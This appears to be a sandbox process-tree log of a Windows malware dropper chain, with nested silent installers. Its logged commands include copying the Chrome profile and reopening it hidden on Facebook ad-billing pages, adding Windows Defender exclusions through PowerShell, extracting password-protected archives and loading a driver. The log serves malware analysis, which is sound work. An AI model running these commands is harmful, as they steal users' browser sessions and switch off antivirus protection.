C:\Users\Admin\AppData\Local\Temp\is-0IDM1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0IDM1.tmp\Setup.exe" /VERYSILENT44⤵PID:13192
-
C:\Users\Admin\AppData\Local\Temp\is-1Q6V0.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-1Q6V0.tmp\Setup.tmp" /SL5="$20808,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-0IDM1.tmp\Setup.exe" /VERYSILENT45⤵PID:8952
-
C:\Users\Admin\AppData\Local\Temp\is-28TF6.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-28TF6.tmp\def.exe" /S /UID=lab21446⤵PID:12688
-
C:\Users\Admin\AppData\Local\Temp\fa-6fbf5-a2b-6bc98-09ebd85c6af37\Raerihitopi.exe"C:\Users\Admin\AppData\Local\Temp\fa-6fbf5-a2b-6bc98-09ebd85c6af37\Raerihitopi.exe"47⤵PID:7920
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pcczjo5v.n3p\lod.exe & exit48⤵PID:10132
-
C:\Users\Admin\AppData\Local\Temp\pcczjo5v.n3p\lod.exeC:\Users\Admin\AppData\Local\Temp\pcczjo5v.n3p\lod.exe49⤵PID:10120
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo HQxchYwhQ50⤵PID:5072
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Riconobbe.xlt50⤵PID:7436
-
C:\Windows\SysWOW64\cmd.execmd51⤵PID:5004
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\01psk315.zuc\customer4.exe & exit48⤵PID:11904
-
C:\Users\Admin\AppData\Local\Temp\01psk315.zuc\customer4.exeC:\Users\Admin\AppData\Local\Temp\01psk315.zuc\customer4.exe49⤵PID:10496
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"50⤵PID:4676
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\svz22sfa.kfh\askinstall18.exe & exit48⤵PID:8860
-
C:\Users\Admin\AppData\Local\Temp\svz22sfa.kfh\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\svz22sfa.kfh\askinstall18.exe49⤵PID:1404
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe50⤵PID:8000
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe51⤵
- Kills process with taskkill
PID:11568
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y50⤵PID:8620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/50⤵PID:2028
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffc9d706e00,0x7ffc9d706e10,0x7ffc9d706e2051⤵PID:12568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1712 /prefetch:851⤵PID:5908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=2256 /prefetch:851⤵PID:8556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:251⤵PID:8764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:151⤵PID:5948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:151⤵PID:11044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:151⤵PID:7816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:151⤵PID:11296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:151⤵PID:6784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2456 /prefetch:151⤵PID:9712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:151⤵PID:6424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1624 /prefetch:151⤵PID:1724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:151⤵PID:8836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:151⤵PID:1584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:151⤵PID:7728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:151⤵PID:9708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,10034962340971635586,2110447382006447248,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=6132 /prefetch:851⤵PID:10548
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3oqss3ti.jy5\md7_7dfj.exe & exit48⤵PID:9300
-
C:\Users\Admin\AppData\Local\Temp\3oqss3ti.jy5\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\3oqss3ti.jy5\md7_7dfj.exe49⤵PID:5444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f5elg2om.0zm\privacytools5.exe & exit48⤵PID:7560
-
C:\Users\Admin\AppData\Local\Temp\f5elg2om.0zm\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\f5elg2om.0zm\privacytools5.exe49⤵PID:8092
-
C:\Users\Admin\AppData\Local\Temp\f5elg2om.0zm\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\f5elg2om.0zm\privacytools5.exe50⤵PID:2928
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\01s1z4z4.h21\GcleanerWW.exe /mixone & exit48⤵PID:6492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gpe00pkc.5y5\setup.exe /8-2222 & exit48⤵PID:5212
-
C:\Users\Admin\AppData\Local\Temp\gpe00pkc.5y5\setup.exeC:\Users\Admin\AppData\Local\Temp\gpe00pkc.5y5\setup.exe /8-222249⤵PID:10796
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Sparkling-Grass"50⤵PID:11896
-
-
C:\Program Files (x86)\Sparkling-Grass\7za.exe"C:\Program Files (x86)\Sparkling-Grass\7za.exe" e -p154.61.71.51 winamp-plugins.7z50⤵PID:10616
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Sparkling-Grass\setup.exe" -map "C:\Program Files (x86)\Sparkling-Grass\WinmonProcessMonitor.sys""50⤵PID:2488
-
C:\Program Files (x86)\Sparkling-Grass\setup.exe"C:\Program Files (x86)\Sparkling-Grass\setup.exe" -map "C:\Program Files (x86)\Sparkling-Grass\WinmonProcessMonitor.sys"51⤵PID:8140
-
-
-
C:\Program Files (x86)\Sparkling-Grass\7za.exe"C:\Program Files (x86)\Sparkling-Grass\7za.exe" e -p154.61.71.51 winamp.7z50⤵PID:9812
-
-
C:\Program Files (x86)\Sparkling-Grass\setup.exe"C:\Program Files (x86)\Sparkling-Grass\setup.exe" /8-222250⤵PID:11148
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5thrshaj.gvb\MultitimerFour.exe & exit48⤵PID:9776
-
C:\Users\Admin\AppData\Local\Temp\5thrshaj.gvb\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\5thrshaj.gvb\MultitimerFour.exe49⤵PID:7448
-
C:\Users\Admin\AppData\Local\Temp\7PIMUNG35K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\7PIMUNG35K\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10450⤵PID:4936
-
C:\Users\Admin\AppData\Local\Temp\7PIMUNG35K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\7PIMUNG35K\multitimer.exe" 1 3.1615300080.604785f0a20f8 10451⤵PID:11288
-
C:\Users\Admin\AppData\Local\Temp\7PIMUNG35K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\7PIMUNG35K\multitimer.exe" 2 3.1615300080.604785f0a20f852⤵PID:7896
-
C:\Users\Admin\AppData\Local\Temp\x0hu1poemfo\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\x0hu1poemfo\Setup3310.exe" /Verysilent /subid=57753⤵PID:10872
-
C:\Users\Admin\AppData\Local\Temp\is-HKIK3.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-HKIK3.tmp\Setup3310.tmp" /SL5="$10906,802346,56832,C:\Users\Admin\AppData\Local\Temp\x0hu1poemfo\Setup3310.exe" /Verysilent /subid=57754⤵PID:7240
-
C:\Users\Admin\AppData\Local\Temp\is-G6FBV.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-G6FBV.tmp\Setup.exe" /Verysilent55⤵PID:9976
-
C:\Users\Admin\AppData\Local\Temp\is-QAB7Q.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-QAB7Q.tmp\Setup.tmp" /SL5="$A02F8,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-G6FBV.tmp\Setup.exe" /Verysilent56⤵PID:7796
-
C:\Users\Admin\AppData\Local\Temp\is-EVID5.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-EVID5.tmp\PictureLAb.exe" /Verysilent57⤵PID:9188
-
C:\Users\Admin\AppData\Local\Temp\is-HLKIR.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-HLKIR.tmp\PictureLAb.tmp" /SL5="$2088E,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-EVID5.tmp\PictureLAb.exe" /Verysilent58⤵PID:7776
-
C:\Users\Admin\AppData\Local\Temp\is-QOBT8.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QOBT8.tmp\Setup.exe" /VERYSILENT59⤵PID:6140
-
C:\Users\Admin\AppData\Local\Temp\is-J3UKB.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-J3UKB.tmp\Setup.tmp" /SL5="$30910,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-QOBT8.tmp\Setup.exe" /VERYSILENT60⤵PID:6300
-
C:\Users\Admin\AppData\Local\Temp\is-BUBQK.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-BUBQK.tmp\def.exe" /S /UID=lab21461⤵PID:13136
-
C:\Users\Admin\AppData\Local\Temp\1d-853d7-06d-1249f-15e644d865b1b\Pavyshuryci.exe"C:\Users\Admin\AppData\Local\Temp\1d-853d7-06d-1249f-15e644d865b1b\Pavyshuryci.exe"62⤵PID:2468
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ixnkazm.lhw\lod.exe & exit63⤵PID:10092
-
C:\Users\Admin\AppData\Local\Temp\1ixnkazm.lhw\lod.exeC:\Users\Admin\AppData\Local\Temp\1ixnkazm.lhw\lod.exe64⤵PID:2796
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo HQxchYwhQ65⤵PID:7752
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Riconobbe.xlt65⤵PID:12792
-
C:\Windows\SysWOW64\cmd.execmd66⤵PID:9836
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3syia3fs.w0k\customer4.exe & exit63⤵PID:11256
-
C:\Users\Admin\AppData\Local\Temp\3syia3fs.w0k\customer4.exeC:\Users\Admin\AppData\Local\Temp\3syia3fs.w0k\customer4.exe64⤵PID:2304
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"65⤵PID:7640
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hivllljs.thf\askinstall18.exe & exit63⤵PID:11720
-
C:\Users\Admin\AppData\Local\Temp\hivllljs.thf\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\hivllljs.thf\askinstall18.exe64⤵PID:7712
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe65⤵PID:12284
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe66⤵
- Kills process with taskkill
PID:10692
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y65⤵PID:11716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/65⤵PID:12652
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffc9d706e00,0x7ffc9d706e10,0x7ffc9d706e2066⤵PID:11924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1680,10542053015723963811,15064803479991615882,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1688 /prefetch:866⤵PID:5240
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jblsfxrm.wu2\md7_7dfj.exe & exit63⤵PID:12556
-
C:\Users\Admin\AppData\Local\Temp\jblsfxrm.wu2\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\jblsfxrm.wu2\md7_7dfj.exe64⤵PID:12544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1es2ha3v.jnp\privacytools5.exe & exit63⤵PID:12160
-
C:\Users\Admin\AppData\Local\Temp\1es2ha3v.jnp\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\1es2ha3v.jnp\privacytools5.exe64⤵PID:10068
-
C:\Users\Admin\AppData\Local\Temp\1es2ha3v.jnp\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\1es2ha3v.jnp\privacytools5.exe65⤵PID:9328
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uz3t0xmd.wcd\GcleanerWW.exe /mixone & exit63⤵PID:6796
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bcqipceb.pjp\setup.exe /8-2222 & exit63⤵PID:8744
-
C:\Users\Admin\AppData\Local\Temp\bcqipceb.pjp\setup.exeC:\Users\Admin\AppData\Local\Temp\bcqipceb.pjp\setup.exe /8-222264⤵PID:1532
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Restless-Cloud"65⤵PID:11688
-
-
C:\Program Files (x86)\Restless-Cloud\7za.exe"C:\Program Files (x86)\Restless-Cloud\7za.exe" e -p154.61.71.51 winamp-plugins.7z65⤵PID:12496
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Restless-Cloud\setup.exe" -map "C:\Program Files (x86)\Restless-Cloud\WinmonProcessMonitor.sys""65⤵PID:13696
-
C:\Program Files (x86)\Restless-Cloud\setup.exe"C:\Program Files (x86)\Restless-Cloud\setup.exe" -map "C:\Program Files (x86)\Restless-Cloud\WinmonProcessMonitor.sys"66⤵PID:13796
-
-
-
C:\Program Files (x86)\Restless-Cloud\7za.exe"C:\Program Files (x86)\Restless-Cloud\7za.exe" e -p154.61.71.51 winamp.7z65⤵PID:1960
-
-
C:\Program Files (x86)\Restless-Cloud\setup.exe"C:\Program Files (x86)\Restless-Cloud\setup.exe" /8-222265⤵PID:7716
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s3ofh1yt.ly5\MultitimerFour.exe & exit63⤵PID:11856
-
C:\Users\Admin\AppData\Local\Temp\s3ofh1yt.ly5\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\s3ofh1yt.ly5\MultitimerFour.exe64⤵PID:12608
-
C:\Users\Admin\AppData\Local\Temp\ASB714Q6LD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ASB714Q6LD\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10465⤵PID:7808
-
C:\Users\Admin\AppData\Local\Temp\ASB714Q6LD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ASB714Q6LD\multitimer.exe" 1 3.1615300196.60478664517f2 10466⤵PID:4772
-
C:\Users\Admin\AppData\Local\Temp\ASB714Q6LD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ASB714Q6LD\multitimer.exe" 2 3.1615300196.60478664517f267⤵PID:10620
-
C:\Users\Admin\AppData\Local\Temp\iyshhtvyq4u\vict.exe"C:\Users\Admin\AppData\Local\Temp\iyshhtvyq4u\vict.exe" /VERYSILENT /id=53568⤵PID:13288
-
C:\Users\Admin\AppData\Local\Temp\is-SG8V4.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-SG8V4.tmp\vict.tmp" /SL5="$10BE0,870426,780800,C:\Users\Admin\AppData\Local\Temp\iyshhtvyq4u\vict.exe" /VERYSILENT /id=53569⤵PID:9344
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuiwpitddlb\xlha50gl4zy.exe"C:\Users\Admin\AppData\Local\Temp\tuiwpitddlb\xlha50gl4zy.exe" /ustwo INSTALL68⤵PID:11680
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "xlha50gl4zy.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\tuiwpitddlb\xlha50gl4zy.exe" & exit69⤵PID:10728
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "xlha50gl4zy.exe" /f70⤵
- Kills process with taskkill
PID:2232
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5pysjzvcje0\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\5pysjzvcje0\askinstall24.exe"68⤵PID:12936
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe69⤵PID:6592
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe70⤵
- Kills process with taskkill
PID:13384
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y69⤵PID:14076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/69⤵PID:13960
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffc9d706e00,0x7ffc9d706e10,0x7ffc9d706e2070⤵PID:14044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,2182067981857989894,12076332267246149294,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1624 /prefetch:870⤵PID:9496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0nwlzw5yrre\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\0nwlzw5yrre\chashepro3.exe" /VERYSILENT68⤵PID:10708
-
C:\Users\Admin\AppData\Local\Temp\is-PGNL1.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-PGNL1.tmp\chashepro3.tmp" /SL5="$20B6C,1478410,58368,C:\Users\Admin\AppData\Local\Temp\0nwlzw5yrre\chashepro3.exe" /VERYSILENT69⤵PID:10244
-
-
-
C:\Users\Admin\AppData\Local\Temp\wwi40jet0ak\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\wwi40jet0ak\Setup3310.exe" /Verysilent /subid=57768⤵PID:10640
-
-
C:\Users\Admin\AppData\Local\Temp\hpt1hnanszq\app.exe"C:\Users\Admin\AppData\Local\Temp\hpt1hnanszq\app.exe" /8-2368⤵PID:12364
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Floral-Sun"69⤵PID:11020
-
-
C:\Program Files (x86)\Floral-Sun\7za.exe"C:\Program Files (x86)\Floral-Sun\7za.exe" e -p154.61.71.51 winamp-plugins.7z69⤵PID:10472
-
-
